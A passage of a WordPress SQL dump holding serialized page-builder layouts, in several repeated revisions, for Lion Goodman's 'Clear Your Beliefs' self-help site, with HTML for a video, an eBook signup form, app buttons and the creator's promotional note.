url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1126, 1611, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -122px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:730:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n</center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:804:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:702:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg"></div>\n\n<p style="text-align: center;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 70px;"><strong>\n[su_button url="#" background="#253aa4" size="9"]LEARN MORE[/su_button] [/su_box]</strong>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1386:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>The <em>Clear Your Beliefs</em> Program will help you:</b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works So Well</b>\n<ul>\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2708:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em, our free app.\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:508:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the &lt;em&gt;Clear Your Beliefs&lt;/em process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1127, 1612, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -122px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:730:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n</center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:804:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:728:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg"></div>\n<p style="text-align: center;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 70px;"><strong>\n[su_button url="#" background="#253aa4" size="9"]LEARN MORE[/su_button] [/su_box]</strong>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1386:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>The <em>Clear Your Beliefs</em> Program will help you:</b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works So Well</b>\n<ul>\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2708:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em, our free app.\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:508:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the &lt;em&gt;Clear Your Beliefs&lt;/em process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1128, 1613, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -122px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:730:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n</center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:804:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:728:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg"></div>\n<p style="text-align: center;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 70px;"><strong>\n[su_button url="#" background="#253aa4" size="9"]LEARN MORE[/su_button] [/su_box]</strong>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1394:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>The <em>Clear Your Beliefs</em> Program… and  How and Why…</b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works So Well</b>\n<ul>\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2708:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em, our free app.\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to 